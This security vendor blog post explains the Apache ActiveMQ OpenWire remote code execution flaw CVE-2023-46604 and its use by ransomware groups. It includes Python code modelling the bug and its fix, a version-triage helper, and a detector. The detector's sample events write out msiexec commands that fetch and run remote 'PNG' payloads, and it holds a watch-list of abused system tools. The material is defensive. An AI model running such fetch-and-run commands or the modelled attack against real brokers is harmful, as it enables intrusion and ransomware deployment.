
Apache ActiveMQ Vulnerability

Chris Swagler | November 12th, 2023


A recently reported critical remote code execution (RCE) vulnerability in Apache ActiveMQ has left over 3,000 internet-exposed servers open to attack. Apache ActiveMQ is a scalable open-source message broker that facilitates communication between clients and servers. It supports Java and a variety of cross-language clients and numerous protocols, including AMQP, MQTT, OpenWire, and STOMP. It is frequently used in enterprise environments where systems need to exchange messages without direct connectivity, and the project supports a diverse set of authentication mechanisms. CVE-2023-46604 is a critical-severity (CVSS v3 score: 10.0) RCE vulnerability that allows a remote attacker with network access to a broker to execute arbitrary shell commands by manipulating serialized class types in the OpenWire protocol, causing the broker to instantiate any class on its classpath. No authentication is required, and the OpenWire transport listens on TCP port 61616 by default, so any broker reachable on that port is exposed.
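To make the root cause concrete, the following is an added model of the bug class, written in Python rather than ActiveMQ's Java, and it is not ActiveMQ's own code: a wire message names an exception class and carries a message string, and the receiver resolves the class name and calls its one-string constructor. The length-prefixed string encoding, the class names, the `RemoteContextLoader` gadget and the URL are all constructed for the example. The "fixed" variant shows the shape of the check the patched releases add: refuse to construct anything that is not actually a Throwable.

```python
"""Added model of the CVE-2023-46604 bug class (not ActiveMQ's code).

An OpenWire ExceptionResponse carries a Throwable as two strings, a class
name and a message. If the receiver resolves the class name and calls a
one-string constructor without checking that the class is a Throwable, the
sender chooses which class on the classpath gets instantiated."""
import struct


# --- toy "classpath": what the receiver could instantiate (constructed) ------
class BrokerException(Exception):
    """A legitimate exception type a peer might report."""


class RemoteContextLoader:
    """Stand-in for a non-exception classpath gadget whose constructor has a
    side effect (e.g. fetching and applying a remote configuration document).
    Hypothetical class, constructed for this example."""
    fetched = []

    def __init__(self, url):
        RemoteContextLoader.fetched.append(url)   # side effect on construction


CLASSPATH = {
    "org.example.BrokerException": BrokerException,
    "org.example.RemoteContextLoader": RemoteContextLoader,
}


def write_utf(s):
    """Java DataOutput.writeUTF style: 2-byte big-endian length + UTF-8 bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def read_utf(buf, pos):
    (n,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    return buf[pos:pos + n].decode("utf-8"), pos + n


def encode_throwable(class_name, message):
    """Encode the (class name, message) pair the way the toy protocol sends it."""
    return write_utf(class_name) + write_utf(message)


def decode_throwable(frame):
    class_name, pos = read_utf(frame, 0)
    message, _ = read_utf(frame, pos)
    return class_name, message


def unmarshal_throwable_vulnerable(frame):
    """Resolve the class and call its (String) constructor with no type check."""
    class_name, message = decode_throwable(frame)
    cls = CLASSPATH[class_name]          # "any class on the classpath"
    return cls(message)


def unmarshal_throwable_fixed(frame):
    """Same, but refuse anything that is not a Throwable before constructing it
    (the shape of the check the patched releases add)."""
    class_name, message = decode_throwable(frame)
    cls = CLASSPATH.get(class_name)
    if cls is None or not issubclass(cls, BaseException):
        raise ValueError(f"Class {class_name} is not assignable to Throwable")
    return cls(message)


if __name__ == "__main__":
    benign = encode_throwable("org.example.BrokerException", "queue full")
    hostile = encode_throwable("org.example.RemoteContextLoader",
                               "http://203.0.113.9/poc.xml")  # constructed URL
    print(repr(unmarshal_throwable_vulnerable(benign)))
    unmarshal_throwable_vulnerable(hostile)
    print("vulnerable path fetched:", RemoteContextLoader.fetched)
    try:
        unmarshal_throwable_fixed(hostile)
    except ValueError as e:
        print("fixed path rejected:", e)
```

The important detail is that the vulnerable path does nothing wrong with the benign frame; the flaw only shows when the sender names a class that was never meant to be reachable from the wire, which is why a type check on the resolved class, not input sanitising on the message string, is the right fix.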

According to Apache's October 27, 2023 disclosure, the problem affects the following Apache ActiveMQ and Legacy OpenWire Module versions:

  • 5.18.x versions before 5.18.3
  • 5.17.x versions before 5.17.6
  • 5.16.x versions before 5.16.7
  • All versions before 5.15.16

Fixed versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3 were released the same day and are the recommended upgrade targets.
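Turning those ranges into something you can run over an inventory is a small job, but branch-aware comparison matters: 5.16.7 is fixed while 5.17.3 is not, so a plain "is it at least 5.18.3" check gives wrong answers. The helper below is an added example, not SpearTip's or Apache's tooling; it encodes the four fixed releases listed above and reports anything outside the listed ranges as "unlisted" rather than safe. The sample version strings and jar file names are constructed.

```python
"""Added triage helper for the CVE-2023-46604 affected-version ranges listed in
the Apache advisory. Not SpearTip's or Apache's tooling."""
import re

# First fixed release on each maintained branch, per the advisory.
FIXED_BY_BRANCH = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
OLDEST_FIX = (5, 15, 16)   # "all versions before 5.15.16" are affected

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Pull a MAJOR.MINOR.PATCH triple out of a version string or a jar file
    name such as 'activemq-broker-5.17.3.jar' (from the broker's lib/ dir)."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def assess(text):
    """Return 'vulnerable', 'fixed', or 'unlisted'.

    'unlisted' means the version is outside the ranges the advisory names
    (for example a newer major line), so it must be checked against the
    advisory directly rather than assumed safe."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        return "vulnerable" if v < FIXED_BY_BRANCH[branch] else "fixed"
    if v < OLDEST_FIX:
        return "vulnerable"
    return "unlisted"


def assess_many(items):
    """Map each input (version string or jar name) to its assessment."""
    return {item: assess(item) for item in items}


if __name__ == "__main__":
    # Constructed sample inputs: version banners and lib/ jar names.
    samples = ["5.18.2", "5.18.3", "5.15.15", "5.16.7", "5.9.0",
               "activemq-broker-5.17.3.jar", "activemq-broker-5.17.6.jar",
               "6.0.0"]
    for item, verdict in assess_many(samples).items():
        print(f"{item:32} {verdict}")
```

In practice the version comes from the broker's web console, the `activemq-broker-*.jar` name in its `lib/` directory, or the version the broker announces in the OpenWire handshake; feed whichever you have to `assess`.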

Servers Unpatched

Researchers found 7,249 servers exposing ActiveMQ services to the internet. 3,329 of them were running an ActiveMQ version vulnerable to CVE-2023-46604 and are therefore exposed to remote code execution. Most of the vulnerable instances, about 1,400, are in China. The US is second with 530, Germany is third with 153, and India, the Netherlands, Russia, France, and South Korea have roughly 100 each.

Two Ransomware Groups Exploiting Vulnerability

One ransomware group, HelloKitty, is exploiting the Apache ActiveMQ remote code execution (RCE) vulnerability to infiltrate networks and encrypt devices. One cybersecurity company detected at least two separate incidents in which threat actors used CVE-2023-46604 on clients' systems to deploy HelloKitty ransomware binaries and extort the targeted companies. The HelloKitty ransomware first appeared in November 2020, and its source code was recently leaked on a Russian-language cybercrime forum, making it available to anybody. The attacks were discovered two days after Apache released the security bulletin and updates, making this a clear case of n-day exploitation: the bug was public and patched, but the targets had not yet upgraded. The company examined two MSI files, disguised as PNG images and downloaded from a suspicious domain, and found that each contains a .NET executable that loads a base64-encoded .NET DLL named EncDLL. EncDLL is responsible for locating and terminating specific processes, encrypting files using the .NET RSACryptoServiceProvider class, and appending a ".locked" extension to them. Among the artifacts left behind by the attacks are:

  • java.exe, the ActiveMQ broker process, acting as the parent of processes it does not normally spawn, which is unusual.
  • Remote binaries named M2.png and M4.png being fetched and executed through MSIExec, which suggests nefarious activity.
  • Repeated failures to encrypt files, indicating inept exploitation efforts.
  • activemq.log entries containing warnings about transport connections failing because the connection was aborted, which may indicate exploitation attempts.
  • The presence of files or network communications connected to HelloKitty ransomware, as identified by specific domains and file hashes.
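The two artifacts in that list that do not depend on vendor-specific hashes, repeated transport-failure warnings in activemq.log and the broker's java.exe spawning msiexec, can be checked with a few lines of code. What follows is an added detection sketch, not SpearTip's or any vendor's detection content. The log excerpt is constructed to match the shape of ActiveMQ's default log layout, the process records are constructed with Sysmon event 1 field names, and every IP address, path, host and file name in them is a placeholder.

```python
"""Added detection sketch for the artifacts listed above (not SpearTip's or any
vendor's detection content). Sample log lines and process events are
constructed to match the shape of activemq.log and Sysmon-style process
creation records; IPs, hosts, paths and file names are placeholders."""
import re
from collections import Counter

# Constructed activemq.log excerpt (default log layout shape).
ACTIVEMQ_LOG = """\
2023-11-02 09:14:02,113 | INFO  | Apache ActiveMQ 5.18.2 (localhost, ID:broker-1) started | org.apache.activemq.broker.BrokerService | main
2023-11-02 09:20:11,507 | WARN  | Transport Connection to: tcp://203.0.113.45:51022 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///203.0.113.45:51022@61616
2023-11-02 09:20:12,020 | WARN  | Transport Connection to: tcp://203.0.113.45:51023 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///203.0.113.45:51023@61616
2023-11-02 09:20:12,611 | WARN  | Transport Connection to: tcp://203.0.113.45:51024 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///203.0.113.45:51024@61616
2023-11-02 09:31:40,002 | WARN  | Transport Connection to: tcp://10.0.8.17:40211 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///10.0.8.17:40211@61616
"""

TRANSPORT_FAIL = re.compile(
    r"^(?P<ts>\S+ \S+) \| WARN\s+\| Transport Connection to: "
    r"tcp://(?P<ip>[^:]+):\d+ failed: (?P<reason>.+?) \|"
)


def transport_failures(log_text):
    """Return (timestamp, source_ip, reason) for every transport-failure warning."""
    out = []
    for line in log_text.splitlines():
        m = TRANSPORT_FAIL.match(line)
        if m:
            out.append((m["ts"], m["ip"], m["reason"]))
    return out


def noisy_sources(log_text, threshold=3):
    """Source IPs with at least `threshold` transport failures: a burst of
    aborted connections from one peer is the pattern the artifact list describes.
    A single failure is normal client noise, so the threshold is the tuning knob."""
    counts = Counter(ip for _, ip, _ in transport_failures(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed process-creation events (Sysmon event 1 field names).
PROCESS_EVENTS = [
    {"ParentImage": r"C:\ActiveMQ\bin\win64\wrapper.exe",
     "Image": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "java -jar activemq.jar start"},
    {"ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://203.0.113.9/M2.png"},
    {"ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://203.0.113.9/M4.png"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i C:\\Users\\admin\\Downloads\\tool.msi"},
]

CHILDREN_OF_INTEREST = {"msiexec.exe", "cmd.exe", "powershell.exe",
                        "certutil.exe", "bitsadmin.exe"}
REMOTE_MSI = re.compile(r"msiexec.*\s[/-]i\s+https?://", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_children(events):
    """Events where the broker's java.exe spawns a child it has no business
    spawning, or where msiexec is pointed at a remote URL regardless of parent."""
    hits = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent == "java.exe" and child in CHILDREN_OF_INTEREST:
            hits.append(ev)
        elif REMOTE_MSI.search(ev["CommandLine"]):
            hits.append(ev)
    return hits


def triage(log_text, events):
    """Bundle both checks into one result for a host under review."""
    return {"noisy_sources": noisy_sources(log_text),
            "suspicious_children": suspicious_children(events)}


if __name__ == "__main__":
    for key, value in triage(ACTIVEMQ_LOG, PROCESS_EVENTS).items():
        print(key, value)
```

The log check alone is weak evidence, since clients that disconnect abruptly produce the same warning; it earns its place when the same source IP shows a burst of failures against port 61616 and the host then shows java.exe launching msiexec against a remote URL. The process check is the stronger of the two and works on Linux too if you substitute the relevant children (sh, curl, wget) for the Windows names.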

The other ransomware group exploiting exposed Apache ActiveMQ servers is the operator of TellYouThePass ransomware. One cybersecurity company found threat actors actively exploiting CVE-2023-46604 for initial access in attacks targeting Linux systems and deploying TellYouThePass ransomware. The two ransomware families share email addresses, infrastructure, and Bitcoin wallet addresses.

Because Apache ActiveMQ serves as a message broker in enterprise environments, exploiting CVE-2023-46604 may result in intercepted messages, disrupted workflows, data theft, and lateral movement through the network. Because technical details for exploiting CVE-2023-46604 are public, applying the patch should be treated as time-sensitive. Where an upgrade cannot happen immediately, brokers should at minimum not be reachable from the internet on the OpenWire port (TCP 61616 by default), and access to that port should be restricted to the clients that need it; this reduces exposure but does not remove the vulnerability. Additionally, companies need to remain aware of the current threat landscape and apply security patches promptly to limit exposure to future vulnerabilities. At SpearTip, our gap analysis allows our engineers to discover blind spots in companies that can lead to significant compromises by comparing technology and internal personnel. We go beyond simple compliance frameworks and examine the day-to-day function of cyber within companies. This leads to critical recommendations by exposing vulnerabilities not only in software but also in companies' people and processes. Identifying technical vulnerabilities inside and outside of companies provides a deeper context to potential gaps in the environment.

If your company is experiencing a breach, call our Security Operations Center at 833.997.7327 to speak directly with an engineer.
